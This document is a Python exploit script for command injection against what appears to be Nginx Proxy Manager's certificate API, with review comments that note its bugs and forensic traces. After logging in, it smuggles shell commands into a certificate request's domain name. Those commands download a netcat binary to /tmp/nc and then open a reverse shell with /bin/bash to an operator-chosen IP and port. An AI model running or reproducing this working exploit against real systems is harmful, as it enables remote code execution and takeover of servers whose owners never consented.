import requests
# Optional proxy for inspecting the script's own traffic (e.g. Burp Suite).
# Left commented out: nothing below passes it to requests.
# PROXY = {"http": "http://127.0.0.1:8080", "https": "http://127.0.0.1:8080"}
TIMEOUT = 60  # seconds; used as `timeout=` on every requests.post call
# Build the header set shared by every request in this script.
def get_headers(url, token=None):
    """Return the request headers for a call against *url*.

    Args:
        url: Base URL of the target; sent verbatim as ``Origin`` and used
            as the prefix of ``Referer`` (``<url>/login``).
        token: Bearer token. When falsy (``None`` or ``""``) the
            ``Authorization`` header is sent as the literal ``Bearer null``.

    Returns:
        dict mapping header names to values, in the order listed below
        (requests emits them in insertion order).
    """
    if token:
        auth_value = f"Bearer {token}"
    else:
        auth_value = "Bearer null"

    # Kept as an ordered list of pairs so the wire order is explicit.
    header_pairs = [
        ("User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0"),
        ("Accept", "application/json, text/javascript, */*; q=0.01"),
        ("Accept-Language", "en-US,en;q=0.5"),
        ("Accept-Encoding", "gzip, deflate, br"),
        ("Content-Type", "application/json; charset=UTF-8"),
        ("Authorization", auth_value),
        ("Origin", url),
        ("Connection", "close"),
        ("Referer", f"{url}/login"),
    ]
    return dict(header_pairs)
# Interactive login: exchange a username/password for an API token.
def login(url):
    """Prompt for credentials, POST them to ``<url>/api/tokens`` and return the token.

    Args:
        url: Base URL of the target.

    Returns:
        The ``token`` field of the JSON response, or ``None`` when the
        request raises ``requests.RequestException`` (connection error,
        timeout, or a non-2xx status via ``raise_for_status``).

    NOTE(review): the password is read with plain ``input()`` (echoed to
    the terminal) and the obtained token is printed, so both can end up in
    terminal scrollback or session logs. A JSON body without a ``token``
    key is not treated as a failure: ``None`` is printed and returned.
    """
    credentials = {
        "identity": input("[+] Enter username: "),
        "secret": input("[+] Enter password: "),
    }
    token_endpoint = f"{url}/api/tokens"
    try:
        reply = requests.post(
            token_endpoint,
            headers=get_headers(url),
            json=credentials,
            timeout=TIMEOUT,
        )
        reply.raise_for_status()
        token = reply.json().get("token")
    except requests.RequestException as err:
        print(f"[-] Login failed: {err}")
        return None
    print(f"[+] Token obtained: {token}")
    return token
# Submit one certificate request carrying `cmd` inside the domain list.
def execute_rce(url, token, cmd):
    """POST a certificate request whose first ``domain_names`` entry embeds *cmd*.

    Args:
        url: Base URL of the target.
        token: Bearer token from ``login``.
        cmd: Command text placed between ``||`` separators inside the
            first ``domain_names`` value.

    Returns:
        The HTTP status code of the response.

    NOTE(review): if ``requests.post`` raises, the exception is swallowed
    and ``res`` is never assigned, so the ``return`` line fails with
    ``UnboundLocalError`` instead of reporting the error. The
    "Command executed" line is printed for any HTTP status, so it does
    not confirm that anything ran; the caller infers that from the
    status code alone.
    """
    json_data = {
        # Injection point: the value closes the quoted domain and chains
        # `cmd` with shell `||` operators. On the server side this shows up
        # as a certificate request with shell metacharacters in a domain.
        "domain_names": [f'test.com"||{cmd}||\\\\n test.com"'],
        "meta": {
            "dns_challenge": False,
            "letsencrypt_agree": True,
            "letsencrypt_email": "[email protected]",
        },
        "provider": "letsencrypt",
    }
    try:
        res = requests.post(f"{url}/api/nginx/certificates", headers=get_headers(url, token), json=json_data, timeout=TIMEOUT)
        print(f"[+] Command executed: {cmd}")  # printed regardless of status
    except requests.RequestException as e:
        pass  # swallowed; `res` stays unbound (see docstring)
    return res.status_code
# Staged flow: two setup commands, a status-code check, then an optional reverse shell.
def rce_exploit(url, token):
    """Run the setup payloads, decide vulnerability from the last status code, and optionally launch a reverse shell.

    Args:
        url: Base URL of the target.
        token: Bearer token from ``login``.

    NOTE(review): only the status code of the *last* setup payload is
    examined, and a 400 response is the sole "vulnerable" signal; no
    output from the injected commands is ever observed. If any request
    raises, ``execute_rce`` fails before the check is reached. From the
    target's side the flow leaves a downloaded file at ``/tmp/nc`` and,
    if continued, an outbound connection to the operator-supplied
    host/port, both of which are observable.
    """
    payloads = [
        'curl https://raw.githubusercontent.com/yunchih/static-binaries/master/nc -o /tmp/nc',
        'chmod +x /tmp/nc'
    ]
    # Send initial payloads to prepare the environment
    for payload in payloads:
        print(f"[+] Sending payload: {payload}")
        status_code = execute_rce(url, token, payload)
    # Vulnerability check: uses the status of the final payload only.
    if status_code == 400:
        print("[+] Target is vulnerable!")
        if input("[+] Proceed with reverse shell? (y/n): ").lower() == "y":
            rev_url = input("[+] Enter reverse shell IP: ")
            rev_port = input("[+] Enter reverse shell port: ")
            cmd = f"/tmp/nc {rev_url} {rev_port} -e /bin/bash"
            execute_rce(url, token, cmd)
            # Nothing here verifies that the connection was established.
            print("[+] Reverse shell command executed!")
        else:
            print("[+] Exploit aborted.")
    else:
        print("[-] Target is not vulnerable.")
# Interactive entry point: gather the target, log in, run the flow.
def main():
    """Collect target details interactively, log in, and run the exploit flow.

    The URL is always built with the ``http://`` scheme, so the credentials
    entered in ``login`` travel in cleartext. The port prompt is shown only
    when the target type was entered as ``i`` (IP); an empty port leaves
    the URL without a port suffix.
    """
    by_ip = input("[+] Target type (IP/Host)? (i/h): ").lower() == "i"
    host = input("[+] Enter IP or Host: ")
    port = ""
    if by_ip:
        port = input("[+] Enter Port: ")
    base_url = f"http://{host}"
    if port:
        base_url = f"{base_url}:{port}"
    token = login(base_url)
    if not token:
        return
    rce_exploit(base_url, token)
# Script guard: nothing runs when the module is imported.
if __name__ == "__main__":
    main()